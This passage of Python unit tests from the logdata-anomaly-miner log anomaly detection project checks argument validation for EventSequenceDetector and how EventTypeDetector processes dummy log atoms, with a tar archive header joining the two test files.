EventSequenceDetector(self.aminer_config, [self.stream_printer_event_handler], timeout=100) EventSequenceDetector(self.aminer_config, [self.stream_printer_event_handler], timeout=100.22) self.assertRaises(ValueError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], persistence_id="") self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], persistence_id=None) self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], persistence_id=b"Default") self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], persistence_id=True) self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], persistence_id=123) self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], persistence_id=123.22) self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], persistence_id={"id": "Default"}) self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], persistence_id=["Default"]) self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], persistence_id=[]) self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], persistence_id=()) self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], persistence_id=set()) EventSequenceDetector(self.aminer_config, [self.stream_printer_event_handler], persistence_id="Default") self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=b"True") self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode="True") self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=123) self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=123.22) self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode={"id": "Default"}) self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=["Default"]) self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=[]) self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=()) self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=set()) EventSequenceDetector(self.aminer_config, [self.stream_printer_event_handler], learn_mode=True) self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], output_logline=None) self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], output_logline=b"True") self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], output_logline="True") self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], output_logline=123) self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], output_logline=123.22) self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], output_logline={"id": "Default"}) self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], output_logline=["Default"]) self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], output_logline=[]) self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], output_logline=()) self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], output_logline=set()) EventSequenceDetector(self.aminer_config, [self.stream_printer_event_handler], output_logline=True) self.assertRaises(ValueError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], ignore_list=[""]) self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], ignore_list="") self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], ignore_list=b"Default") self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], ignore_list=True) self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], ignore_list=123) self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], ignore_list=123.3) self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], ignore_list={"id": "Default"}) self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], ignore_list=()) self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], ignore_list=set()) EventSequenceDetector(self.aminer_config, [self.stream_printer_event_handler], ignore_list=[]) EventSequenceDetector(self.aminer_config, [self.stream_printer_event_handler], ignore_list=None) self.assertRaises(ValueError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], constraint_list=[""]) self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], constraint_list="") self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], constraint_list=b"Default") self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], constraint_list=True) self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], constraint_list=123) self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], constraint_list=123.3) self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], constraint_list={"id": "Default"}) self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], constraint_list=()) self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], constraint_list=set()) EventSequenceDetector(self.aminer_config, [self.stream_printer_event_handler], constraint_list=[]) EventSequenceDetector(self.aminer_config, [self.stream_printer_event_handler], constraint_list=None) self.assertRaises(ValueError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, stop_learning_time=-1) self.assertRaises(ValueError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, stop_learning_time=0) self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, stop_learning_time=b"Default") self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, stop_learning_time="123") self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, stop_learning_time={"id": "Default"}) self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, stop_learning_time=["Default"]) self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, stop_learning_time=[]) self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, stop_learning_time=()) self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, stop_learning_time=set()) EventSequenceDetector(self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, stop_learning_time=100) EventSequenceDetector(self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, stop_learning_time=100.22) self.assertRaises(ValueError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, stop_learning_no_anomaly_time=-1) self.assertRaises(ValueError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, stop_learning_no_anomaly_time=0) self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, stop_learning_no_anomaly_time=b"Default") self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, stop_learning_no_anomaly_time="123") self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, stop_learning_no_anomaly_time={"id": "Default"}) self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, stop_learning_no_anomaly_time=["Default"]) self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, stop_learning_no_anomaly_time=[]) self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, stop_learning_no_anomaly_time=()) self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, stop_learning_no_anomaly_time=set()) EventSequenceDetector(self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, stop_learning_no_anomaly_time=100) EventSequenceDetector(self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, stop_learning_no_anomaly_time=100.22) self.assertRaises(ValueError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, stop_learning_time=100, stop_learning_no_anomaly_time=100) self.assertRaises(ValueError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], log_resource_ignore_list=["/tmp/syslog"]) self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], log_resource_ignore_list="") self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], log_resource_ignore_list=b"Default") self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], log_resource_ignore_list=True) self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], log_resource_ignore_list=123) self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], log_resource_ignore_list=123.22) self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], log_resource_ignore_list={"id": "Default"}) self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], log_resource_ignore_list=()) self.assertRaises(TypeError, EventSequenceDetector, self.aminer_config, [self.stream_printer_event_handler], log_resource_ignore_list=set()) EventSequenceDetector(self.aminer_config, [self.stream_printer_event_handler], log_resource_ignore_list=["file:///tmp/syslog"]) if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/analysis/EventTypeDetectorTest.py000066400000000000000000001211771500476301700304430ustar00rootroot00000000000000import time import unittest from aminer.analysis.EventTypeDetector import EventTypeDetector from aminer.input.LogAtom import LogAtom from aminer.parsing.ParserMatch import ParserMatch from aminer.parsing.MatchElement import MatchElement from unit.TestBase import TestBase, DummyMatchContext, DummyFixedDataModelElement, DummySequenceModelElement from aminer.AminerConfig import DEFAULT_PERSISTENCE_PERIOD class EventTypeDetectorTest(TestBase): """Unittests for the EventTypeDetector.""" match_context = DummyMatchContext(b" pid=25537 uid=2") fdme1 = DummyFixedDataModelElement("s11", b" pid=") fdme2 = DummyFixedDataModelElement("d1", b"25537") seq1 = DummySequenceModelElement("seq", [fdme1, fdme2]) match_element1 = seq1.get_match_element("", match_context) match_context = DummyMatchContext(b"ddd 25538ddd ") fdme3 = DummyFixedDataModelElement("s11", b"ddd ") fdme4 = DummyFixedDataModelElement("d1", b"25538") seq2 = DummySequenceModelElement("seq", [fdme3, fdme4]) match_element2 = seq2.get_match_element("", match_context) match_element3 = fdme3.get_match_element("/seq", match_context) def test1receive_atom(self): """Test if log atoms are processed correctly.""" etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler]) t = round(time.time(), 3) log_atom1 = LogAtom(self.match_element1.match_string, ParserMatch(self.match_element1), t, etd) log_atom2 = LogAtom(self.match_element2.match_string, ParserMatch(self.match_element2), t, etd) log_atom3 = LogAtom(self.match_element3.match_string, ParserMatch(self.match_element3), t, etd) # default arguments # In this test case multiple log_atoms are received with default values of the EventTypeDetector. target_path_list is empty and all paths are learned dynamically in variable_key_list. self.assertTrue(etd.receive_atom(log_atom1)) self.assertEqual(self.output_stream.getvalue(), "") self.assertEqual(etd.num_events, 1) self.assertTrue(all(x in [{"/seq", "/seq/s11", "/seq/d1"}] for x in etd.found_keys)) self.assertTrue(all(sorted(x) in [sorted(["/seq/d1", "/seq/s11", "/seq"])] for x in etd.variable_key_list)) self.assertEqual([sorted([y for y in x if isinstance(y[0], (int, float))]) + sorted([y for y in x if isinstance(y[0], str)]) for x in etd.values], [[[25537.0], [" pid="], [" pid=25537"]]]) self.assertEqual(etd.check_variables, [[True, True, True]]) self.assertEqual(etd.longest_path, ["/seq/s11"]) self.assertEqual(etd.id_path_list_tuples, []) self.assertEqual(etd.current_index, 0) self.assertEqual(etd.num_event_lines, [1]) self.assertTrue(etd.receive_atom(log_atom2)) self.assertEqual(etd.num_events, 1) self.assertTrue(all(x in [{"/seq", "/seq/s11", "/seq/d1"}] for x in etd.found_keys)) self.assertTrue(all(sorted(x) in [sorted(["/seq/d1", "/seq/s11", "/seq"])] for x in etd.variable_key_list)) self.assertEqual([sorted([y for y in x if isinstance(y[0], (int, float))]) + sorted([y for y in x if isinstance(y[0], str)]) for x in etd.values], [[[25537.0, 25538.0], [" pid=", "ddd "], [" pid=25537", "ddd 25538"]]]) self.assertEqual(etd.check_variables, [[True, True, True]]) self.assertEqual(etd.longest_path, ["/seq/s11"]) self.assertEqual(etd.id_path_list_tuples, []) self.assertEqual(etd.current_index, 0) self.assertEqual(etd.num_event_lines, [2]) self.assertTrue(etd.receive_atom(log_atom3)) self.assertEqual(etd.num_events, 2) self.assertTrue(all(x in [{"/seq", "/seq/s11", "/seq/d1"}, {"/seq/s11"}] for x in etd.found_keys)) self.assertTrue(all(sorted(x) in [sorted(["/seq/d1", "/seq/s11", "/seq"]), ["/seq/s11"]] for x in etd.variable_key_list)) self.assertEqual([sorted([y for y in x if isinstance(y[0], (int, float))]) + sorted([y for y in x if isinstance(y[0], str)]) for x in etd.values], [[[25537.0, 25538.0], [" pid=", "ddd "], [" pid=25537", "ddd 25538"]], [["ddd "]]]) self.assertEqual(etd.check_variables, [[True, True, True], [True]]) self.assertEqual(etd.longest_path, ["/seq/s11", "/seq/s11"]) self.assertEqual(etd.id_path_list_tuples, []) self.assertEqual(etd.current_index, 1) self.assertEqual(etd.num_event_lines, [2, 1]) # default arguments + save_values=False etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler], save_values=False) self.assertTrue(etd.receive_atom(log_atom1)) self.assertEqual(self.output_stream.getvalue(), "") self.assertEqual(etd.num_events, 1) self.assertTrue(all(x in [{"/seq", "/seq/s11", "/seq/d1"}] for x in etd.found_keys)) self.assertTrue(all(sorted(x) in [sorted(["/seq/d1", "/seq/s11", "/seq"])] for x in etd.variable_key_list)) self.assertEqual(etd.values, []) self.assertEqual(etd.check_variables, []) self.assertEqual(etd.longest_path, ["/seq/s11"]) self.assertEqual(etd.id_path_list_tuples, []) self.assertEqual(etd.current_index, 0) self.assertEqual(etd.num_event_lines, [1]) self.assertTrue(etd.receive_atom(log_atom2)) self.assertEqual(etd.num_events, 1) self.assertTrue(all(x in [{"/seq", "/seq/s11", "/seq/d1"}] for x in etd.found_keys)) self.assertTrue(all(sorted(x) in [sorted(["/seq/d1", "/seq/s11", "/seq"])] for x in etd.variable_key_list)) self.assertEqual(etd.values, []) self.assertEqual(etd.check_variables, []) self.assertEqual(etd.longest_path, ["/seq/s11"]) self.assertEqual(etd.id_path_list_tuples, []) self.assertEqual(etd.current_index, 0) self.assertEqual(etd.num_event_lines, [2]) self.assertTrue(etd.receive_atom(log_atom3)) self.assertEqual(etd.num_events, 2) self.assertTrue(all(x in [{"/seq", "/seq/s11", "/seq/d1"}, {"/seq/s11"}] for x in etd.found_keys)) self.assertTrue(all(sorted(x) in [sorted(["/seq/d1", "/seq/s11", "/seq"]), ["/seq/s11"]] for x in etd.variable_key_list)) self.assertEqual(etd.values, []) self.assertEqual(etd.check_variables, []) self.assertEqual(etd.longest_path, ["/seq/s11", "/seq/s11"]) self.assertEqual(etd.id_path_list_tuples, []) self.assertEqual(etd.current_index, 1) self.assertEqual(etd.num_event_lines, [2, 1]) # target_path_list + save_values=True etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler], target_path_list=["/seq/s11"]) self.assertTrue(etd.receive_atom(log_atom1)) self.assertEqual(self.output_stream.getvalue(), "") self.assertEqual(etd.num_events, 1) self.assertTrue(all(x in [{"/seq", "/seq/s11", "/seq/d1"}] for x in etd.found_keys)) self.assertTrue(all(sorted(x) in [sorted(["/seq/s11"])] for x in etd.variable_key_list)) self.assertEqual([sorted([y for y in x if isinstance(y[0], (int, float))]) + sorted([y for y in x if isinstance(y[0], str)]) for x in etd.values], [[[" pid="]]]) self.assertEqual(etd.check_variables, [[True]]) self.assertEqual(etd.longest_path, ["/seq/s11"]) self.assertEqual(etd.id_path_list_tuples, []) self.assertEqual(etd.current_index, 0) self.assertEqual(etd.num_event_lines, [1]) self.assertTrue(etd.receive_atom(log_atom2)) self.assertEqual(etd.num_events, 1) self.assertTrue(all(x in [{"/seq", "/seq/s11", "/seq/d1"}] for x in etd.found_keys)) self.assertTrue(all(sorted(x) in [sorted(["/seq/s11"])] for x in etd.variable_key_list)) self.assertEqual([sorted([y for y in x if isinstance(y[0], (int, float))]) + sorted([y for y in x if isinstance(y[0], str)]) for x in etd.values], [[[" pid=", "ddd "]]]) self.assertEqual(etd.check_variables, [[True]]) self.assertEqual(etd.longest_path, ["/seq/s11"]) self.assertEqual(etd.id_path_list_tuples, []) self.assertEqual(etd.current_index, 0) self.assertEqual(etd.num_event_lines, [2]) self.assertTrue(etd.receive_atom(log_atom3)) self.assertEqual(etd.num_events, 2) self.assertTrue(all(x in [{"/seq", "/seq/s11", "/seq/d1"}, {"/seq/s11"}] for x in etd.found_keys)) self.assertTrue(all(sorted(x) in [sorted(["/seq/s11"]), ["/seq/s11"]] for x in etd.variable_key_list)) self.assertEqual([sorted([y for y in x if isinstance(y[0], (int, float))]) + sorted([y for y in x if isinstance(y[0], str)]) for x in etd.values], [[[" pid=", "ddd "]], [["ddd "]]]) self.assertEqual(etd.check_variables, [[True], [True]]) self.assertEqual(etd.longest_path, ["/seq/s11", "/seq/s11"]) self.assertEqual(etd.id_path_list_tuples, []) self.assertEqual(etd.current_index, 1) self.assertEqual(etd.num_event_lines, [2, 1]) # target_path_list + save_values=False etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler], target_path_list=["/seq/s11"], save_values=False) self.assertTrue(etd.receive_atom(log_atom1)) self.assertEqual(self.output_stream.getvalue(), "") self.assertEqual(etd.num_events, 1) self.assertTrue(all(x in [{"/seq", "/seq/s11", "/seq/d1"}] for x in etd.found_keys)) self.assertTrue(all(sorted(x) in [sorted(["/seq/s11"])] for x in etd.variable_key_list)) self.assertEqual(etd.values, []) self.assertEqual(etd.check_variables, []) self.assertEqual(etd.longest_path, ["/seq/s11"]) self.assertEqual(etd.id_path_list_tuples, []) self.assertEqual(etd.current_index, 0) self.assertEqual(etd.num_event_lines, [1]) self.assertTrue(etd.receive_atom(log_atom2)) self.assertEqual(etd.num_events, 1) self.assertTrue(all(x in [{"/seq", "/seq/s11", "/seq/d1"}] for x in etd.found_keys)) self.assertTrue(all(sorted(x) in [sorted(["/seq/s11"])] for x in etd.variable_key_list)) self.assertEqual(etd.values, []) self.assertEqual(etd.check_variables, []) self.assertEqual(etd.longest_path, ["/seq/s11"]) self.assertEqual(etd.id_path_list_tuples, []) self.assertEqual(etd.current_index, 0) self.assertEqual(etd.num_event_lines, [2]) self.assertTrue(etd.receive_atom(log_atom3)) self.assertEqual(etd.num_events, 2) self.assertTrue(all(x in [{"/seq", "/seq/s11", "/seq/d1"}, {"/seq/s11"}] for x in etd.found_keys)) self.assertTrue(all(sorted(x) in [sorted(["/seq/s11"]), ["/seq/s11"]] for x in etd.variable_key_list)) self.assertEqual(etd.values, []) self.assertEqual(etd.check_variables, []) self.assertEqual(etd.longest_path, ["/seq/s11", "/seq/s11"]) self.assertEqual(etd.id_path_list_tuples, []) self.assertEqual(etd.current_index, 1) self.assertEqual(etd.num_event_lines, [2, 1]) # id_path_list + save_values=True etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler], id_path_list=["/seq/s11"]) self.assertTrue(etd.receive_atom(log_atom1)) self.assertEqual(self.output_stream.getvalue(), "") self.assertEqual(etd.num_events, 1) self.assertTrue(all(x in [{"/seq", "/seq/s11", "/seq/d1"}] for x in etd.found_keys)) self.assertTrue(all(sorted(x) in [sorted(["/seq/d1", "/seq/s11", "/seq"])] for x in etd.variable_key_list)) self.assertEqual([sorted([y for y in x if isinstance(y[0], (int, float))]) + sorted([y for y in x if isinstance(y[0], str)]) for x in etd.values], [[[25537.0], [" pid="], [" pid=25537"]]]) self.assertEqual(etd.check_variables, [[True, True, True]]) self.assertEqual(etd.longest_path, []) self.assertEqual(etd.id_path_list_tuples, [(" pid=",)]) self.assertEqual(etd.current_index, 0) self.assertEqual(etd.num_event_lines, [1]) self.assertTrue(etd.receive_atom(log_atom2)) self.assertEqual(etd.num_events, 2) self.assertTrue(all(x in [{"/seq", "/seq/s11", "/seq/d1"}] for x in etd.found_keys)) self.assertTrue(all(sorted(x) in [sorted(["/seq/d1", "/seq/s11", "/seq"])] for x in etd.variable_key_list)) self.assertEqual([sorted([y for y in x if isinstance(y[0], (int, float))]) + sorted([y for y in x if isinstance(y[0], str)]) for x in etd.values], [[[25537.0], [" pid="], [" pid=25537"]], [[25538.0], ["ddd "], ["ddd 25538"]]]) self.assertEqual(etd.check_variables, [[True, True, True], [True, True, True]]) self.assertEqual(etd.longest_path, []) self.assertEqual(etd.id_path_list_tuples, [(" pid=",), ("ddd ",)]) self.assertEqual(etd.current_index, 1) self.assertEqual(etd.num_event_lines, [1, 1]) self.assertTrue(etd.receive_atom(log_atom3)) self.assertEqual(etd.num_events, 2) self.assertTrue(all(x in [{"/seq", "/seq/s11", "/seq/d1"}, {"/seq/s11"}] for x in etd.found_keys)) self.assertTrue(all(sorted(x) in [sorted(["/seq/d1", "/seq/s11", "/seq"]), ["/seq/s11"]] for x in etd.variable_key_list)) self.assertEqual([sorted([y for y in x if len(y) > 0 and isinstance(y[0], (int, float))]) + sorted([y for y in x if len(y) > 0 and isinstance(y[0], str)]) + [y for y in x if len(y) == 0] for x in etd.values], [[[25537.0], [" pid="], [" pid=25537"]], [["ddd ", "ddd "], [], []]]) self.assertEqual(etd.check_variables, [[True, True, True], [y != [] for y in etd.values[1]]]) self.assertEqual(etd.longest_path, []) self.assertEqual(etd.id_path_list_tuples, [(" pid=",), ("ddd ",)]) self.assertEqual(etd.current_index, 1) self.assertEqual(etd.num_event_lines, [1, 2]) # id_path_list + save_values=False etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler], id_path_list=["/seq/s11"], save_values=False) self.assertTrue(etd.receive_atom(log_atom1)) self.assertEqual(self.output_stream.getvalue(), "") self.assertEqual(etd.num_events, 1) self.assertTrue(all(x in [{"/seq", "/seq/s11", "/seq/d1"}] for x in etd.found_keys)) self.assertTrue(all(sorted(x) in [sorted(["/seq/d1", "/seq/s11", "/seq"])] for x in etd.variable_key_list)) self.assertEqual(etd.values, []) self.assertEqual(etd.check_variables, []) self.assertEqual(etd.longest_path, []) self.assertEqual(etd.id_path_list_tuples, [(" pid=",)]) self.assertEqual(etd.current_index, 0) self.assertEqual(etd.num_event_lines, [1]) self.assertTrue(etd.receive_atom(log_atom2)) self.assertEqual(etd.num_events, 2) self.assertTrue(all(x in [{"/seq", "/seq/s11", "/seq/d1"}] for x in etd.found_keys)) self.assertTrue(all(sorted(x) in [sorted(["/seq/d1", "/seq/s11", "/seq"])] for x in etd.variable_key_list)) self.assertEqual(etd.values, []) self.assertEqual(etd.check_variables, []) self.assertEqual(etd.longest_path, []) self.assertEqual(etd.id_path_list_tuples, [(" pid=",), ("ddd ",)]) self.assertEqual(etd.current_index, 1) self.assertEqual(etd.num_event_lines, [1, 1]) self.assertTrue(etd.receive_atom(log_atom3)) self.assertEqual(etd.num_events, 2) self.assertTrue(all(x in [{"/seq", "/seq/s11", "/seq/d1"}, {"/seq/s11"}] for x in etd.found_keys)) self.assertTrue(all(sorted(x) in [sorted(["/seq/d1", "/seq/s11", "/seq"]), ["/seq/s11"]] for x in etd.variable_key_list)) self.assertEqual(etd.values, []) self.assertEqual(etd.check_variables, []) self.assertEqual(etd.longest_path, []) self.assertEqual(etd.id_path_list_tuples, [(" pid=",), ("ddd ",)]) self.assertEqual(etd.current_index, 1) self.assertEqual(etd.num_event_lines, [1, 2]) # id_path_list + save_values=True + allow_missing_id=True etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler], id_path_list=["/seq/s11", "/seq/s12"]) self.assertFalse(etd.receive_atom(log_atom1)) self.assertFalse(etd.receive_atom(log_atom2)) self.assertFalse(etd.receive_atom(log_atom3)) etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler], id_path_list=["/seq/s11", "/seq/s12"], allow_missing_id=True) self.assertTrue(etd.receive_atom(log_atom1)) self.assertEqual(self.output_stream.getvalue(), "") self.assertEqual(etd.num_events, 1) self.assertTrue(all(x in [{"/seq", "/seq/s11", "/seq/d1"}] for x in etd.found_keys)) self.assertTrue(all(sorted(x) in [sorted(["/seq/d1", "/seq/s11", "/seq"])] for x in etd.variable_key_list)) self.assertEqual([sorted([y for y in x if isinstance(y[0], (int, float))]) + sorted([y for y in x if isinstance(y[0], str)]) for x in etd.values], [[[25537.0], [" pid="], [" pid=25537"]]]) self.assertEqual(etd.check_variables, [[True, True, True]]) self.assertEqual(etd.longest_path, []) self.assertEqual(etd.id_path_list_tuples, [(" pid=", "")]) self.assertEqual(etd.current_index, 0) self.assertEqual(etd.num_event_lines, [1]) self.assertTrue(etd.receive_atom(log_atom2)) self.assertEqual(etd.num_events, 2) self.assertTrue(all(x in [{"/seq", "/seq/s11", "/seq/d1"}] for x in etd.found_keys)) self.assertTrue(all(sorted(x) in [sorted(["/seq/d1", "/seq/s11", "/seq"])] for x in etd.variable_key_list)) self.assertEqual([sorted([y for y in x if isinstance(y[0], (int, float))]) + sorted([y for y in x if isinstance(y[0], str)]) for x in etd.values], [[[25537.0], [" pid="], [" pid=25537"]], [[25538.0], ["ddd "], ["ddd 25538"]]]) self.assertEqual(etd.check_variables, [[True, True, True], [True, True, True]]) self.assertEqual(etd.longest_path, []) self.assertEqual(etd.id_path_list_tuples, [(" pid=", ""), ("ddd ", "")]) self.assertEqual(etd.current_index, 1) self.assertEqual(etd.num_event_lines, [1, 1]) self.assertTrue(etd.receive_atom(log_atom3)) self.assertEqual(etd.num_events, 2) self.assertTrue(all(x in [{"/seq", "/seq/s11", "/seq/d1"}, {"/seq/s11"}] for x in etd.found_keys)) self.assertTrue(all(sorted(x) in [sorted(["/seq/d1", "/seq/s11", "/seq"]), ["/seq/s11"]] for x in etd.variable_key_list)) self.assertEqual([sorted([y for y in x if len(y) > 0 and isinstance(y[0], (int, float))]) + sorted([y for y in x if len(y) > 0 and isinstance(y[0], str)]) + [y for y in x if len(y) == 0] for x in etd.values], [[[25537.0], [" pid="], [" pid=25537"]], [["ddd ", "ddd "], [], []]]) self.assertEqual(etd.check_variables, [[True, True, True], [y != [] for y in etd.values[1]]]) self.assertEqual(etd.longest_path, []) self.assertEqual(etd.id_path_list_tuples, [(" pid=", ""), ("ddd ", "")]) self.assertEqual(etd.current_index, 1) self.assertEqual(etd.num_event_lines, [1, 2]) # id_path_list + save_values=True + allowed_id_tuples etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler], id_path_list=["/seq/s11"], allowed_id_tuples=[(" pid=",)]) self.assertTrue(etd.receive_atom(log_atom1)) self.assertEqual(self.output_stream.getvalue(), "") self.assertEqual(etd.num_events, 1) self.assertTrue(all(x in [{"/seq", "/seq/s11", "/seq/d1"}] for x in etd.found_keys)) self.assertTrue(all(sorted(x) in [sorted(["/seq/d1", "/seq/s11", "/seq"])] for x in etd.variable_key_list)) self.assertEqual([sorted([y for y in x if isinstance(y[0], (int, float))]) + sorted([y for y in x if isinstance(y[0], str)]) for x in etd.values], [[[25537.0], [" pid="], [" pid=25537"]]]) self.assertEqual(etd.check_variables, [[True, True, True]]) self.assertEqual(etd.longest_path, []) self.assertEqual(etd.id_path_list_tuples, [(" pid=",)]) self.assertEqual(etd.current_index, 0) self.assertEqual(etd.num_event_lines, [1]) self.assertFalse(etd.receive_atom(log_atom2)) self.assertEqual(etd.num_events, 1) self.assertTrue(all(x in [{"/seq", "/seq/s11", "/seq/d1"}] for x in etd.found_keys)) self.assertTrue(all(sorted(x) in [sorted(["/seq/d1", "/seq/s11", "/seq"])] for x in etd.variable_key_list)) self.assertEqual([sorted([y for y in x if isinstance(y[0], (int, float))]) + sorted([y for y in x if isinstance(y[0], str)]) for x in etd.values], [[[25537.0], [" pid="], [" pid=25537"]]]) self.assertEqual(etd.check_variables, [[True, True, True]]) self.assertEqual(etd.longest_path, []) self.assertEqual(etd.id_path_list_tuples, [(" pid=",)]) self.assertEqual(etd.current_index, -1) self.assertEqual(etd.num_event_lines, [1]) self.assertFalse(etd.receive_atom(log_atom3)) self.assertEqual(etd.num_events, 1) self.assertTrue(all(x in [{"/seq", "/seq/s11", "/seq/d1"}, {"/seq/s11"}] for x in etd.found_keys)) self.assertTrue(all(sorted(x) in [sorted(["/seq/d1", "/seq/s11", "/seq"]), ["/seq/s11"]] for x in etd.variable_key_list)) self.assertEqual([sorted([y for y in x if isinstance(y[0], (int, float))]) + sorted([y for y in x if isinstance(y[0], str)]) for x in etd.values], [[[25537.0], [" pid="], [" pid=25537"]]]) self.assertEqual(etd.check_variables, [[True, True, True]]) self.assertEqual(etd.longest_path, []) self.assertEqual(etd.id_path_list_tuples, [(" pid=",)]) self.assertEqual(etd.current_index, -1) 